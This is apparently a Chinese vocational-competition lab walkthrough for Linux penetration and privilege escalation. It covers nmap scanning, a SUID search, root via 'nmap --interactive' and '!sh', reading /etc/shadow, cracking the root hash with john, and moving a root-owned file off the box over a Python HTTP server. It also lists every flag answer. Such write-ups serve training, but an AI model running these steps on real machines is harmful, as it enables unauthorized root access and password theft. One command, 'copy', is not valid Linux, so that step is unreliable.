2023年中职“网络安全“—Linux系统渗透提权③

2023年中职"网络安全"---Linux系统渗透提权③

  • Linux系统渗透提权
    • 任务环境说明:
      • [1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;](#1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;)
      • [2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;](#2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;)
      • [3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;](#3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;)
      • [4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;](#4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;)
      • [5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;](#5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;)
      • [6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。](#6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。)

Linux系统渗透提权

任务环境说明:

  • 服务器场景:Server2202(关闭链接)
  • 用户名:hacker密码:123456

1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

bash 复制代码
nmap -p- -sV -T4 -n 靶机IP
# -p- 全部端口
# -sV 版本探测
# -T4 针对TCP端口禁止动态扫描延迟超过10ms
# -n 不做DNS解析

flag: 22/tcp

2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;

bash 复制代码
uname -a            # 输出操作系统信息

flag: Kiowizity

3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

bash 复制代码
uname -a            # 输出操作系统信息

flag: 3.13.0-45-generic

4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

bash 复制代码
ls /root
cat /root/adftutij.txt

flag: hyjufk983

5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

bash 复制代码
find / -perm -u=s -type f 2>/dev/null
# find 查找命令
# / 从根目录开始
# -perm 查找权限
# -u=s 有suid权限的文件
# -type 文件类型
# -f 普通文件
# 2 标准错误输出
# > 输
# /dev/null 空设备文件
bash 复制代码
nmap --interactive        # 进入nmap交互模式
!sh                       # 执行sh
id                        # 查看id
cat /etc/shadow           # shadow 文件保存密码
bash 复制代码
vim hash        # 把root信息行写入进去
cat hash        # 查看是否赋值成功
john hash       # 破解hash

flag: 0987654321

6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。

bash 复制代码
pwd                                # 查看当前目录
copy /root/flag.jpg flag.jpg       # 复制过来
python -m SimpleHTTPServer 8080    # 在8080端口开启一个HTTP服务
text 复制代码
注意一定要加:8080 指定HTTP端口

flag: 2022_year_Skill_competition

相关推荐
安科瑞刘鸿鹏13 分钟前
老旧小区用电安全保护装置#限流式防火保护器参数介绍#
运维·服务器·物联网·能源
ladymorgana22 分钟前
【运维笔记】windows 11 中提示:无法成功完成操作,因为文件包含病毒或潜在的垃圾软件。
运维·windows·笔记
Rain_Rong32 分钟前
linux检测硬盘
linux·运维·服务器
过过过呀Glik36 分钟前
在 Ubuntu 上安装 Muduo 网络库的详细指南
linux·c++·ubuntu·boost·muduo
李昊哲小课1 小时前
deepin 安装 zookeeper
大数据·运维·zookeeper·debian·hbase
真真-真真1 小时前
WebXR
linux·运维·服务器
hao_wujing1 小时前
网络安全攻防演练中的常见计策
安全·web安全
轩辰~2 小时前
网络协议入门
linux·服务器·开发语言·网络·arm开发·c++·网络协议
Mitch3112 小时前
【漏洞复现】CVE-2015-3337 Arbitrary File Reading
elasticsearch·网络安全·docker·漏洞复现
燕雀安知鸿鹄之志哉.2 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全